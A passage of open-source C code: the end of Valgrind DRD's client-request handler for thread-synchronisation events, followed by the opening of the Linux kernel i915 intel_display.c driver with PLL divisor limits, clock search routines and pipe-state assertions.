DRD_(semaphore_post_wait)(drd_tid, arg[1], arg[2]);
break;
case VG_USERREQ__PRE_SEM_POST:
if (DRD_(thread_enter_synchr)(drd_tid) == 0)
DRD_(semaphore_pre_post)(drd_tid, arg[1]);
break;
case VG_USERREQ__POST_SEM_POST:
if (DRD_(thread_leave_synchr)(drd_tid) == 0)
DRD_(semaphore_post_post)(drd_tid, arg[1], arg[2]);
break;
case VG_USERREQ__PRE_BARRIER_INIT:
if (DRD_(thread_enter_synchr)(drd_tid) == 0)
DRD_(barrier_init)(arg[1], arg[2], arg[3], arg[4]);
break;
case VG_USERREQ__POST_BARRIER_INIT:
DRD_(thread_leave_synchr)(drd_tid);
break;
case VG_USERREQ__PRE_BARRIER_DESTROY:
DRD_(thread_enter_synchr)(drd_tid);
break;
case VG_USERREQ__POST_BARRIER_DESTROY:
if (DRD_(thread_leave_synchr)(drd_tid) == 0)
DRD_(barrier_destroy)(arg[1], arg[2]);
break;
case VG_USERREQ__PRE_BARRIER_WAIT:
if (DRD_(thread_enter_synchr)(drd_tid) == 0)
DRD_(barrier_pre_wait)(drd_tid, arg[1], arg[2]);
break;
case VG_USERREQ__POST_BARRIER_WAIT:
if (DRD_(thread_leave_synchr)(drd_tid) == 0)
DRD_(barrier_post_wait)(drd_tid, arg[1], arg[2], arg[3], arg[4]);
break;
case VG_USERREQ__PRE_RWLOCK_INIT:
DRD_(rwlock_pre_init)(arg[1], pthread_rwlock);
break;
case VG_USERREQ__POST_RWLOCK_DESTROY:
DRD_(rwlock_post_destroy)(arg[1], pthread_rwlock);
break;
case VG_USERREQ__PRE_RWLOCK_RDLOCK:
if (DRD_(thread_enter_synchr)(drd_tid) == 0)
DRD_(rwlock_pre_rdlock)(arg[1], pthread_rwlock);
break;
case VG_USERREQ__POST_RWLOCK_RDLOCK:
if (DRD_(thread_leave_synchr)(drd_tid) == 0)
DRD_(rwlock_post_rdlock)(arg[1], pthread_rwlock, arg[2]);
break;
case VG_USERREQ__PRE_RWLOCK_WRLOCK:
if (DRD_(thread_enter_synchr)(drd_tid) == 0)
DRD_(rwlock_pre_wrlock)(arg[1], pthread_rwlock);
break;
case VG_USERREQ__POST_RWLOCK_WRLOCK:
if (DRD_(thread_leave_synchr)(drd_tid) == 0)
DRD_(rwlock_post_wrlock)(arg[1], pthread_rwlock, arg[2]);
break;
case VG_USERREQ__PRE_RWLOCK_UNLOCK:
if (DRD_(thread_enter_synchr)(drd_tid) == 0)
DRD_(rwlock_pre_unlock)(arg[1], pthread_rwlock);
break;
case VG_USERREQ__POST_RWLOCK_UNLOCK:
DRD_(thread_leave_synchr)(drd_tid);
break;
case VG_USERREQ__DRD_CLEAN_MEMORY:
if (arg[2] > 0)
DRD_(clean_memory)(arg[1], arg[2]);
break;
case VG_USERREQ__HELGRIND_ANNOTATION_UNIMP:
{
/* Note: it is assumed below that the text arg[1] points to is never
* freed, e.g. because it points to static data.
*/
UnimpClReqInfo UICR =
{ DRD_(thread_get_running_tid)(), (Char*)arg[1] };
VG_(maybe_record_error)(vg_tid,
UnimpHgClReq,
VG_(get_IP)(vg_tid),
"",
&UICR);
}
break;
case VG_USERREQ__DRD_ANNOTATION_UNIMP:
{
/* Note: it is assumed below that the text arg[1] points to is never
* freed, e.g. because it points to static data.
*/
UnimpClReqInfo UICR =
{ DRD_(thread_get_running_tid)(), (Char*)arg[1] };
VG_(maybe_record_error)(vg_tid,
UnimpDrdClReq,
VG_(get_IP)(vg_tid),
"",
&UICR);
}
break;
default:
#if 0
VG_(message)(Vg_DebugMsg, "Unrecognized client request 0x%lx 0x%lx",
arg[0], arg[1]);
tl_assert(0);
#endif
return False;
}
*ret = result;
return True;
}
| gpl-2.0 |
gshwang/kernel-3.1.4 | drivers/gpu/drm/i915/intel_display.c | 3 | 239957 | /*
* Copyright © 2006-2007 Intel Corporation
*
* Permission is hereby granted, free of charge, to any person obtaining a
* copy of this software and associated documentation files (the "Software"),
* to deal in the Software without restriction, including without limitation
* the rights to use, copy, modify, merge, publish, distribute, sublicense,
* and/or sell copies of the Software, and to permit persons to whom the
* Software is furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice (including the next
* paragraph) shall be included in all copies or substantial portions of the
* Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
* THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
* FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
* DEALINGS IN THE SOFTWARE.
*
* Authors:
* Eric Anholt <eric@anholt.net>
*/
#include <linux/cpufreq.h>
#include <linux/module.h>
#include <linux/input.h>
#include <linux/i2c.h>
#include <linux/kernel.h>
#include <linux/slab.h>
#include <linux/vgaarb.h>
#include "drmP.h"
#include "intel_drv.h"
#include "i915_drm.h"
#include "i915_drv.h"
#include "i915_trace.h"
#include "drm_dp_helper.h"
#include "drm_crtc_helper.h"
#define HAS_eDP (intel_pipe_has_type(crtc, INTEL_OUTPUT_EDP))
bool intel_pipe_has_type (struct drm_crtc *crtc, int type);
static void intel_update_watermarks(struct drm_device *dev);
static void intel_increase_pllclock(struct drm_crtc *crtc);
static void intel_crtc_update_cursor(struct drm_crtc *crtc, bool on);
typedef struct {
/* given values */
int n;
int m1, m2;
int p1, p2;
/* derived values */
int dot;
int vco;
int m;
int p;
} intel_clock_t;
typedef struct {
int min, max;
} intel_range_t;
typedef struct {
int dot_limit;
int p2_slow, p2_fast;
} intel_p2_t;
#define INTEL_P2_NUM 2
typedef struct intel_limit intel_limit_t;
struct intel_limit {
intel_range_t dot, vco, n, m, m1, m2, p, p1;
intel_p2_t p2;
bool (* find_pll)(const intel_limit_t *, struct drm_crtc *,
int, int, intel_clock_t *);
};
/* FDI */
#define IRONLAKE_FDI_FREQ 2700000 /* in kHz for mode->clock */
static bool
intel_find_best_PLL(const intel_limit_t *limit, struct drm_crtc *crtc,
int target, int refclk, intel_clock_t *best_clock);
static bool
intel_g4x_find_best_PLL(const intel_limit_t *limit, struct drm_crtc *crtc,
int target, int refclk, intel_clock_t *best_clock);
static bool
intel_find_pll_g4x_dp(const intel_limit_t *, struct drm_crtc *crtc,
int target, int refclk, intel_clock_t *best_clock);
static bool
intel_find_pll_ironlake_dp(const intel_limit_t *, struct drm_crtc *crtc,
int target, int refclk, intel_clock_t *best_clock);
static inline u32 /* units of 100MHz */
intel_fdi_link_freq(struct drm_device *dev)
{
if (IS_GEN5(dev)) {
struct drm_i915_private *dev_priv = dev->dev_private;
return (I915_READ(FDI_PLL_BIOS_0) & FDI_PLL_FB_CLOCK_MASK) + 2;
} else
return 27;
}
static const intel_limit_t intel_limits_i8xx_dvo = {
.dot = { .min = 25000, .max = 350000 },
.vco = { .min = 930000, .max = 1400000 },
.n = { .min = 3, .max = 16 },
.m = { .min = 96, .max = 140 },
.m1 = { .min = 18, .max = 26 },
.m2 = { .min = 6, .max = 16 },
.p = { .min = 4, .max = 128 },
.p1 = { .min = 2, .max = 33 },
.p2 = { .dot_limit = 165000,
.p2_slow = 4, .p2_fast = 2 },
.find_pll = intel_find_best_PLL,
};
static const intel_limit_t intel_limits_i8xx_lvds = {
.dot = { .min = 25000, .max = 350000 },
.vco = { .min = 930000, .max = 1400000 },
.n = { .min = 3, .max = 16 },
.m = { .min = 96, .max = 140 },
.m1 = { .min = 18, .max = 26 },
.m2 = { .min = 6, .max = 16 },
.p = { .min = 4, .max = 128 },
.p1 = { .min = 1, .max = 6 },
.p2 = { .dot_limit = 165000,
.p2_slow = 14, .p2_fast = 7 },
.find_pll = intel_find_best_PLL,
};
static const intel_limit_t intel_limits_i9xx_sdvo = {
.dot = { .min = 20000, .max = 400000 },
.vco = { .min = 1400000, .max = 2800000 },
.n = { .min = 1, .max = 6 },
.m = { .min = 70, .max = 120 },
.m1 = { .min = 10, .max = 22 },
.m2 = { .min = 5, .max = 9 },
.p = { .min = 5, .max = 80 },
.p1 = { .min = 1, .max = 8 },
.p2 = { .dot_limit = 200000,
.p2_slow = 10, .p2_fast = 5 },
.find_pll = intel_find_best_PLL,
};
static const intel_limit_t intel_limits_i9xx_lvds = {
.dot = { .min = 20000, .max = 400000 },
.vco = { .min = 1400000, .max = 2800000 },
.n = { .min = 1, .max = 6 },
.m = { .min = 70, .max = 120 },
.m1 = { .min = 10, .max = 22 },
.m2 = { .min = 5, .max = 9 },
.p = { .min = 7, .max = 98 },
.p1 = { .min = 1, .max = 8 },
.p2 = { .dot_limit = 112000,
.p2_slow = 14, .p2_fast = 7 },
.find_pll = intel_find_best_PLL,
};
static const intel_limit_t intel_limits_g4x_sdvo = {
.dot = { .min = 25000, .max = 270000 },
.vco = { .min = 1750000, .max = 3500000},
.n = { .min = 1, .max = 4 },
.m = { .min = 104, .max = 138 },
.m1 = { .min = 17, .max = 23 },
.m2 = { .min = 5, .max = 11 },
.p = { .min = 10, .max = 30 },
.p1 = { .min = 1, .max = 3},
.p2 = { .dot_limit = 270000,
.p2_slow = 10,
.p2_fast = 10
},
.find_pll = intel_g4x_find_best_PLL,
};
static const intel_limit_t intel_limits_g4x_hdmi = {
.dot = { .min = 22000, .max = 400000 },
.vco = { .min = 1750000, .max = 3500000},
.n = { .min = 1, .max = 4 },
.m = { .min = 104, .max = 138 },
.m1 = { .min = 16, .max = 23 },
.m2 = { .min = 5, .max = 11 },
.p = { .min = 5, .max = 80 },
.p1 = { .min = 1, .max = 8},
.p2 = { .dot_limit = 165000,
.p2_slow = 10, .p2_fast = 5 },
.find_pll = intel_g4x_find_best_PLL,
};
static const intel_limit_t intel_limits_g4x_single_channel_lvds = {
.dot = { .min = 20000, .max = 115000 },
.vco = { .min = 1750000, .max = 3500000 },
.n = { .min = 1, .max = 3 },
.m = { .min = 104, .max = 138 },
.m1 = { .min = 17, .max = 23 },
.m2 = { .min = 5, .max = 11 },
.p = { .min = 28, .max = 112 },
.p1 = { .min = 2, .max = 8 },
.p2 = { .dot_limit = 0,
.p2_slow = 14, .p2_fast = 14
},
.find_pll = intel_g4x_find_best_PLL,
};
static const intel_limit_t intel_limits_g4x_dual_channel_lvds = {
.dot = { .min = 80000, .max = 224000 },
.vco = { .min = 1750000, .max = 3500000 },
.n = { .min = 1, .max = 3 },
.m = { .min = 104, .max = 138 },
.m1 = { .min = 17, .max = 23 },
.m2 = { .min = 5, .max = 11 },
.p = { .min = 14, .max = 42 },
.p1 = { .min = 2, .max = 6 },
.p2 = { .dot_limit = 0,
.p2_slow = 7, .p2_fast = 7
},
.find_pll = intel_g4x_find_best_PLL,
};
static const intel_limit_t intel_limits_g4x_display_port = {
.dot = { .min = 161670, .max = 227000 },
.vco = { .min = 1750000, .max = 3500000},
.n = { .min = 1, .max = 2 },
.m = { .min = 97, .max = 108 },
.m1 = { .min = 0x10, .max = 0x12 },
.m2 = { .min = 0x05, .max = 0x06 },
.p = { .min = 10, .max = 20 },
.p1 = { .min = 1, .max = 2},
.p2 = { .dot_limit = 0,
.p2_slow = 10, .p2_fast = 10 },
.find_pll = intel_find_pll_g4x_dp,
};
static const intel_limit_t intel_limits_pineview_sdvo = {
.dot = { .min = 20000, .max = 400000},
.vco = { .min = 1700000, .max = 3500000 },
/* Pineview's Ncounter is a ring counter */
.n = { .min = 3, .max = 6 },
.m = { .min = 2, .max = 256 },
/* Pineview only has one combined m divider, which we treat as m2. */
.m1 = { .min = 0, .max = 0 },
.m2 = { .min = 0, .max = 254 },
.p = { .min = 5, .max = 80 },
.p1 = { .min = 1, .max = 8 },
.p2 = { .dot_limit = 200000,
.p2_slow = 10, .p2_fast = 5 },
.find_pll = intel_find_best_PLL,
};
static const intel_limit_t intel_limits_pineview_lvds = {
.dot = { .min = 20000, .max = 400000 },
.vco = { .min = 1700000, .max = 3500000 },
.n = { .min = 3, .max = 6 },
.m = { .min = 2, .max = 256 },
.m1 = { .min = 0, .max = 0 },
.m2 = { .min = 0, .max = 254 },
.p = { .min = 7, .max = 112 },
.p1 = { .min = 1, .max = 8 },
.p2 = { .dot_limit = 112000,
.p2_slow = 14, .p2_fast = 14 },
.find_pll = intel_find_best_PLL,
};
/* Ironlake / Sandybridge
*
* We calculate clock using (register_value + 2) for N/M1/M2, so here
* the range value for them is (actual_value - 2).
*/
static const intel_limit_t intel_limits_ironlake_dac = {
.dot = { .min = 25000, .max = 350000 },
.vco = { .min = 1760000, .max = 3510000 },
.n = { .min = 1, .max = 5 },
.m = { .min = 79, .max = 127 },
.m1 = { .min = 12, .max = 22 },
.m2 = { .min = 5, .max = 9 },
.p = { .min = 5, .max = 80 },
.p1 = { .min = 1, .max = 8 },
.p2 = { .dot_limit = 225000,
.p2_slow = 10, .p2_fast = 5 },
.find_pll = intel_g4x_find_best_PLL,
};
static const intel_limit_t intel_limits_ironlake_single_lvds = {
.dot = { .min = 25000, .max = 350000 },
.vco = { .min = 1760000, .max = 3510000 },
.n = { .min = 1, .max = 3 },
.m = { .min = 79, .max = 118 },
.m1 = { .min = 12, .max = 22 },
.m2 = { .min = 5, .max = 9 },
.p = { .min = 28, .max = 112 },
.p1 = { .min = 2, .max = 8 },
.p2 = { .dot_limit = 225000,
.p2_slow = 14, .p2_fast = 14 },
.find_pll = intel_g4x_find_best_PLL,
};
static const intel_limit_t intel_limits_ironlake_dual_lvds = {
.dot = { .min = 25000, .max = 350000 },
.vco = { .min = 1760000, .max = 3510000 },
.n = { .min = 1, .max = 3 },
.m = { .min = 79, .max = 127 },
.m1 = { .min = 12, .max = 22 },
.m2 = { .min = 5, .max = 9 },
.p = { .min = 14, .max = 56 },
.p1 = { .min = 2, .max = 8 },
.p2 = { .dot_limit = 225000,
.p2_slow = 7, .p2_fast = 7 },
.find_pll = intel_g4x_find_best_PLL,
};
/* LVDS 100mhz refclk limits. */
static const intel_limit_t intel_limits_ironlake_single_lvds_100m = {
.dot = { .min = 25000, .max = 350000 },
.vco = { .min = 1760000, .max = 3510000 },
.n = { .min = 1, .max = 2 },
.m = { .min = 79, .max = 126 },
.m1 = { .min = 12, .max = 22 },
.m2 = { .min = 5, .max = 9 },
.p = { .min = 28, .max = 112 },
.p1 = { .min = 2,.max = 8 },
.p2 = { .dot_limit = 225000,
.p2_slow = 14, .p2_fast = 14 },
.find_pll = intel_g4x_find_best_PLL,
};
static const intel_limit_t intel_limits_ironlake_dual_lvds_100m = {
.dot = { .min = 25000, .max = 350000 },
.vco = { .min = 1760000, .max = 3510000 },
.n = { .min = 1, .max = 3 },
.m = { .min = 79, .max = 126 },
.m1 = { .min = 12, .max = 22 },
.m2 = { .min = 5, .max = 9 },
.p = { .min = 14, .max = 42 },
.p1 = { .min = 2,.max = 6 },
.p2 = { .dot_limit = 225000,
.p2_slow = 7, .p2_fast = 7 },
.find_pll = intel_g4x_find_best_PLL,
};
static const intel_limit_t intel_limits_ironlake_display_port = {
.dot = { .min = 25000, .max = 350000 },
.vco = { .min = 1760000, .max = 3510000},
.n = { .min = 1, .max = 2 },
.m = { .min = 81, .max = 90 },
.m1 = { .min = 12, .max = 22 },
.m2 = { .min = 5, .max = 9 },
.p = { .min = 10, .max = 20 },
.p1 = { .min = 1, .max = 2},
.p2 = { .dot_limit = 0,
.p2_slow = 10, .p2_fast = 10 },
.find_pll = intel_find_pll_ironlake_dp,
};
static const intel_limit_t *intel_ironlake_limit(struct drm_crtc *crtc,
int refclk)
{
struct drm_device *dev = crtc->dev;
struct drm_i915_private *dev_priv = dev->dev_private;
const intel_limit_t *limit;
if (intel_pipe_has_type(crtc, INTEL_OUTPUT_LVDS)) {
if ((I915_READ(PCH_LVDS) & LVDS_CLKB_POWER_MASK) ==
LVDS_CLKB_POWER_UP) {
/* LVDS dual channel */
if (refclk == 100000)
limit = &intel_limits_ironlake_dual_lvds_100m;
else
limit = &intel_limits_ironlake_dual_lvds;
} else {
if (refclk == 100000)
limit = &intel_limits_ironlake_single_lvds_100m;
else
limit = &intel_limits_ironlake_single_lvds;
}
} else if (intel_pipe_has_type(crtc, INTEL_OUTPUT_DISPLAYPORT) ||
HAS_eDP)
limit = &intel_limits_ironlake_display_port;
else
limit = &intel_limits_ironlake_dac;
return limit;
}
static const intel_limit_t *intel_g4x_limit(struct drm_crtc *crtc)
{
struct drm_device *dev = crtc->dev;
struct drm_i915_private *dev_priv = dev->dev_private;
const intel_limit_t *limit;
if (intel_pipe_has_type(crtc, INTEL_OUTPUT_LVDS)) {
if ((I915_READ(LVDS) & LVDS_CLKB_POWER_MASK) ==
LVDS_CLKB_POWER_UP)
/* LVDS with dual channel */
limit = &intel_limits_g4x_dual_channel_lvds;
else
/* LVDS with dual channel */
limit = &intel_limits_g4x_single_channel_lvds;
} else if (intel_pipe_has_type(crtc, INTEL_OUTPUT_HDMI) ||
intel_pipe_has_type(crtc, INTEL_OUTPUT_ANALOG)) {
limit = &intel_limits_g4x_hdmi;
} else if (intel_pipe_has_type(crtc, INTEL_OUTPUT_SDVO)) {
limit = &intel_limits_g4x_sdvo;
} else if (intel_pipe_has_type (crtc, INTEL_OUTPUT_DISPLAYPORT)) {
limit = &intel_limits_g4x_display_port;
} else /* The option is for other outputs */
limit = &intel_limits_i9xx_sdvo;
return limit;
}
static const intel_limit_t *intel_limit(struct drm_crtc *crtc, int refclk)
{
struct drm_device *dev = crtc->dev;
const intel_limit_t *limit;
if (HAS_PCH_SPLIT(dev))
limit = intel_ironlake_limit(crtc, refclk);
else if (IS_G4X(dev)) {
limit = intel_g4x_limit(crtc);
} else if (IS_PINEVIEW(dev)) {
if (intel_pipe_has_type(crtc, INTEL_OUTPUT_LVDS))
limit = &intel_limits_pineview_lvds;
else
limit = &intel_limits_pineview_sdvo;
} else if (!IS_GEN2(dev)) {
if (intel_pipe_has_type(crtc, INTEL_OUTPUT_LVDS))
limit = &intel_limits_i9xx_lvds;
else
limit = &intel_limits_i9xx_sdvo;
} else {
if (intel_pipe_has_type(crtc, INTEL_OUTPUT_LVDS))
limit = &intel_limits_i8xx_lvds;
else
limit = &intel_limits_i8xx_dvo;
}
return limit;
}
/* m1 is reserved as 0 in Pineview, n is a ring counter */
static void pineview_clock(int refclk, intel_clock_t *clock)
{
clock->m = clock->m2 + 2;
clock->p = clock->p1 * clock->p2;
clock->vco = refclk * clock->m / clock->n;
clock->dot = clock->vco / clock->p;
}
static void intel_clock(struct drm_device *dev, int refclk, intel_clock_t *clock)
{
if (IS_PINEVIEW(dev)) {
pineview_clock(refclk, clock);
return;
}
clock->m = 5 * (clock->m1 + 2) + (clock->m2 + 2);
clock->p = clock->p1 * clock->p2;
clock->vco = refclk * clock->m / (clock->n + 2);
clock->dot = clock->vco / clock->p;
}
/**
* Returns whether any output on the specified pipe is of the specified type
*/
bool intel_pipe_has_type(struct drm_crtc *crtc, int type)
{
struct drm_device *dev = crtc->dev;
struct drm_mode_config *mode_config = &dev->mode_config;
struct intel_encoder *encoder;
list_for_each_entry(encoder, &mode_config->encoder_list, base.head)
if (encoder->base.crtc == crtc && encoder->type == type)
return true;
return false;
}
#define INTELPllInvalid(s) do { /* DRM_DEBUG(s); */ return false; } while (0)
/**
* Returns whether the given set of divisors are valid for a given refclk with
* the given connectors.
*/
static bool intel_PLL_is_valid(struct drm_device *dev,
const intel_limit_t *limit,
const intel_clock_t *clock)
{
if (clock->p1 < limit->p1.min || limit->p1.max < clock->p1)
INTELPllInvalid ("p1 out of range\n");
if (clock->p < limit->p.min || limit->p.max < clock->p)
INTELPllInvalid ("p out of range\n");
if (clock->m2 < limit->m2.min || limit->m2.max < clock->m2)
INTELPllInvalid ("m2 out of range\n");
if (clock->m1 < limit->m1.min || limit->m1.max < clock->m1)
INTELPllInvalid ("m1 out of range\n");
if (clock->m1 <= clock->m2 && !IS_PINEVIEW(dev))
INTELPllInvalid ("m1 <= m2\n");
if (clock->m < limit->m.min || limit->m.max < clock->m)
INTELPllInvalid ("m out of range\n");
if (clock->n < limit->n.min || limit->n.max < clock->n)
INTELPllInvalid ("n out of range\n");
if (clock->vco < limit->vco.min || limit->vco.max < clock->vco)
INTELPllInvalid ("vco out of range\n");
/* XXX: We may need to be checking "Dot clock" depending on the multiplier,
* connector, etc., rather than just a single range.
*/
if (clock->dot < limit->dot.min || limit->dot.max < clock->dot)
INTELPllInvalid ("dot out of range\n");
return true;
}
static bool
intel_find_best_PLL(const intel_limit_t *limit, struct drm_crtc *crtc,
int target, int refclk, intel_clock_t *best_clock)
{
struct drm_device *dev = crtc->dev;
struct drm_i915_private *dev_priv = dev->dev_private;
intel_clock_t clock;
int err = target;
if (intel_pipe_has_type(crtc, INTEL_OUTPUT_LVDS) &&
(I915_READ(LVDS)) != 0) {
/*
* For LVDS, if the panel is on, just rely on its current
* settings for dual-channel. We haven't figured out how to
* reliably set up different single/dual channel state, if we
* even can.
*/
if ((I915_READ(LVDS) & LVDS_CLKB_POWER_MASK) ==
LVDS_CLKB_POWER_UP)
clock.p2 = limit->p2.p2_fast;
else
clock.p2 = limit->p2.p2_slow;
} else {
if (target < limit->p2.dot_limit)
clock.p2 = limit->p2.p2_slow;
else
clock.p2 = limit->p2.p2_fast;
}
memset (best_clock, 0, sizeof (*best_clock));
for (clock.m1 = limit->m1.min; clock.m1 <= limit->m1.max;
clock.m1++) {
for (clock.m2 = limit->m2.min;
clock.m2 <= limit->m2.max; clock.m2++) {
/* m1 is always 0 in Pineview */
if (clock.m2 >= clock.m1 && !IS_PINEVIEW(dev))
break;
for (clock.n = limit->n.min;
clock.n <= limit->n.max; clock.n++) {
for (clock.p1 = limit->p1.min;
clock.p1 <= limit->p1.max; clock.p1++) {
int this_err;
intel_clock(dev, refclk, &clock);
if (!intel_PLL_is_valid(dev, limit,
&clock))
continue;
this_err = abs(clock.dot - target);
if (this_err < err) {
*best_clock = clock;
err = this_err;
}
}
}
}
}
return (err != target);
}
static bool
intel_g4x_find_best_PLL(const intel_limit_t *limit, struct drm_crtc *crtc,
int target, int refclk, intel_clock_t *best_clock)
{
struct drm_device *dev = crtc->dev;
struct drm_i915_private *dev_priv = dev->dev_private;
intel_clock_t clock;
int max_n;
bool found;
/* approximately equals target * 0.00585 */
int err_most = (target >> 8) + (target >> 9);
found = false;
if (intel_pipe_has_type(crtc, INTEL_OUTPUT_LVDS)) {
int lvds_reg;
if (HAS_PCH_SPLIT(dev))
lvds_reg = PCH_LVDS;
else
lvds_reg = LVDS;
if ((I915_READ(lvds_reg) & LVDS_CLKB_POWER_MASK) ==
LVDS_CLKB_POWER_UP)
clock.p2 = limit->p2.p2_fast;
else
clock.p2 = limit->p2.p2_slow;
} else {
if (target < limit->p2.dot_limit)
clock.p2 = limit->p2.p2_slow;
else
clock.p2 = limit->p2.p2_fast;
}
memset(best_clock, 0, sizeof(*best_clock));
max_n = limit->n.max;
/* based on hardware requirement, prefer smaller n to precision */
for (clock.n = limit->n.min; clock.n <= max_n; clock.n++) {
/* based on hardware requirement, prefere larger m1,m2 */
for (clock.m1 = limit->m1.max;
clock.m1 >= limit->m1.min; clock.m1--) {
for (clock.m2 = limit->m2.max;
clock.m2 >= limit->m2.min; clock.m2--) {
for (clock.p1 = limit->p1.max;
clock.p1 >= limit->p1.min; clock.p1--) {
int this_err;
intel_clock(dev, refclk, &clock);
if (!intel_PLL_is_valid(dev, limit,
&clock))
continue;
this_err = abs(clock.dot - target);
if (this_err < err_most) {
*best_clock = clock;
err_most = this_err;
max_n = clock.n;
found = true;
}
}
}
}
}
return found;
}
static bool
intel_find_pll_ironlake_dp(const intel_limit_t *limit, struct drm_crtc *crtc,
int target, int refclk, intel_clock_t *best_clock)
{
struct drm_device *dev = crtc->dev;
intel_clock_t clock;
if (target < 200000) {
clock.n = 1;
clock.p1 = 2;
clock.p2 = 10;
clock.m1 = 12;
clock.m2 = 9;
} else {
clock.n = 2;
clock.p1 = 1;
clock.p2 = 10;
clock.m1 = 14;
clock.m2 = 8;
}
intel_clock(dev, refclk, &clock);
memcpy(best_clock, &clock, sizeof(intel_clock_t));
return true;
}
/* DisplayPort has only two frequencies, 162MHz and 270MHz */
static bool
intel_find_pll_g4x_dp(const intel_limit_t *limit, struct drm_crtc *crtc,
int target, int refclk, intel_clock_t *best_clock)
{
intel_clock_t clock;
if (target < 200000) {
clock.p1 = 2;
clock.p2 = 10;
clock.n = 2;
clock.m1 = 23;
clock.m2 = 8;
} else {
clock.p1 = 1;
clock.p2 = 10;
clock.n = 1;
clock.m1 = 14;
clock.m2 = 2;
}
clock.m = 5 * (clock.m1 + 2) + (clock.m2 + 2);
clock.p = (clock.p1 * clock.p2);
clock.dot = 96000 * clock.m / (clock.n + 2) / clock.p;
clock.vco = 0;
memcpy(best_clock, &clock, sizeof(intel_clock_t));
return true;
}
/**
* intel_wait_for_vblank - wait for vblank on a given pipe
* @dev: drm device
* @pipe: pipe to wait for
*
* Wait for vblank to occur on a given pipe. Needed for various bits of
* mode setting code.
*/
void intel_wait_for_vblank(struct drm_device *dev, int pipe)
{
struct drm_i915_private *dev_priv = dev->dev_private;
int pipestat_reg = PIPESTAT(pipe);
/* Clear existing vblank status. Note this will clear any other
* sticky status fields as well.
*
* This races with i915_driver_irq_handler() with the result
* that either function could miss a vblank event. Here it is not
* fatal, as we will either wait upon the next vblank interrupt or
* timeout. Generally speaking intel_wait_for_vblank() is only
* called during modeset at which time the GPU should be idle and
* should *not* be performing page flips and thus not waiting on
* vblanks...
* Currently, the result of us stealing a vblank from the irq
* handler is that a single frame will be skipped during swapbuffers.
*/
I915_WRITE(pipestat_reg,
I915_READ(pipestat_reg) | PIPE_VBLANK_INTERRUPT_STATUS);
/* Wait for vblank interrupt bit to set */
if (wait_for(I915_READ(pipestat_reg) &
PIPE_VBLANK_INTERRUPT_STATUS,
50))
DRM_DEBUG_KMS("vblank wait timed out\n");
}
/*
* intel_wait_for_pipe_off - wait for pipe to turn off
* @dev: drm device
* @pipe: pipe to wait for
*
* After disabling a pipe, we can't wait for vblank in the usual way,
* spinning on the vblank interrupt status bit, since we won't actually
* see an interrupt when the pipe is disabled.
*
* On Gen4 and above:
* wait for the pipe register state bit to turn off
*
* Otherwise:
* wait for the display line value to settle (it usually
* ends up stopping at the start of the next frame).
*
*/
void intel_wait_for_pipe_off(struct drm_device *dev, int pipe)
{
struct drm_i915_private *dev_priv = dev->dev_private;
if (INTEL_INFO(dev)->gen >= 4) {
int reg = PIPECONF(pipe);
/* Wait for the Pipe State to go off */
if (wait_for((I915_READ(reg) & I965_PIPECONF_ACTIVE) == 0,
100))
DRM_DEBUG_KMS("pipe_off wait timed out\n");
} else {
u32 last_line;
int reg = PIPEDSL(pipe);
unsigned long timeout = jiffies + msecs_to_jiffies(100);
/* Wait for the display line to settle */
do {
last_line = I915_READ(reg) & DSL_LINEMASK;
mdelay(5);
} while (((I915_READ(reg) & DSL_LINEMASK) != last_line) &&
time_after(timeout, jiffies));
if (time_after(jiffies, timeout))
DRM_DEBUG_KMS("pipe_off wait timed out\n");
}
}
static const char *state_string(bool enabled)
{
return enabled ? "on" : "off";
}
/* Only for pre-ILK configs */
static void assert_pll(struct drm_i915_private *dev_priv,
enum pipe pipe, bool state)
{
int reg;
u32 val;
bool cur_state;
reg = DPLL(pipe);
val = I915_READ(reg);
cur_state = !!(val & DPLL_VCO_ENABLE);
WARN(cur_state != state,
"PLL state assertion failure (expected %s, current %s)\n",
state_string(state), state_string(cur_state));
}
#define assert_pll_enabled(d, p) assert_pll(d, p, true)
#define assert_pll_disabled(d, p) assert_pll(d, p, false)
/* For ILK+ */
static void assert_pch_pll(struct drm_i915_private *dev_priv,
enum pipe pipe, bool state)
{
int reg;
u32 val;
bool cur_state;
reg = PCH_DPLL(pipe);
val = I915_READ(reg);
cur_state = !!(val & DPLL_VCO_ENABLE);
WARN(cur_state != state,
"PCH PLL state assertion failure (expected %s, current %s)\n",
state_string(state), state_string(cur_state));
}
#define assert_pch_pll_enabled(d, p) assert_pch_pll(d, p, true)
#define assert_pch_pll_disabled(d, p) assert_pch_pll(d, p, false)
static void assert_fdi_tx(struct drm_i915_private *dev_priv,
enum pipe pipe, bool state)
{
int reg;
u32 val;
bool cur_state;
reg = FDI_TX_CTL(pipe);
val = I915_READ(reg);
cur_state = !!(val & FDI_TX_ENABLE);
WARN(cur_state != state,
"FDI TX state assertion failure (expected %s, current %s)\n",
state_string(state), state_string(cur_state));
}
#define assert_fdi_tx_enabled(d, p) assert_fdi_tx(d, p, true)
#define assert_fdi_tx_disabled(d, p) assert_fdi_tx(d, p, false)
static void assert_fdi_rx(struct drm_i915_private *dev_priv,
enum pipe pipe, bool state)
{
int reg;
u32 val;
bool cur_state;
reg = FDI_RX_CTL(pipe);
val = I915_READ(reg);
cur_state = !!(val & FDI_RX_ENABLE);
WARN(cur_state != state,
"FDI RX state assertion failure (expected %s, current %s)\n",
state_string(state), state_string(cur_state));
}
#define assert_fdi_rx_enabled(d, p) assert_fdi_rx(d, p, true)
#define assert_fdi_rx_disabled(d, p) assert_fdi_rx(d, p, false)
static void assert_fdi_tx_pll_enabled(struct drm_i915_private *dev_priv,
enum pipe pipe)
{
int reg;
u32 val;
/* ILK FDI PLL is always enabled */
if (dev_priv->info->gen == 5)
return;
reg = FDI_TX_CTL(pipe);
val = I915_READ(reg);
WARN(!(val & FDI_TX_PLL_ENABLE), "FDI TX PLL assertion failure, should be active but is disabled\n");
}
static void assert_fdi_rx_pll_enabled(struct drm_i915_private *dev_priv,
enum pipe pipe)
{
int reg;
u32 val;
